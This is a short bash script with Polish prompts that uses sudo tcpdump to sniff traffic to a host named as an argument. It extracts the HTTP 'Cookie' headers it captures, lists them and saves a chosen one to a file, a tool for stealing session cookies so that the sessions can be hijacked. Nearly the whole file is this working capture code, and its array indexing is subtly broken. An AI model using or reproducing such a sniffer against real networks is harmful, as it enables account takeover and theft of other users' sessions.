#!/bin/bash

	
		mapfile -t result < <(sudo tcpdump host $1 -s 0 -w - -l 2>/dev/null | grep -ai -m $2 ^Cookie)

	
		for (( c=0; c<$2; c++ ))
		do
   			echo "Ciasteczko "
			echo $result[$c]
		done
		number=-1
		while [ $number -lt 0 ] || [ $number -gt $2 ]
		do
 			echo "Numer ciasteczka"
                	read number
		done
		echo $result[$number] > ciasteczka

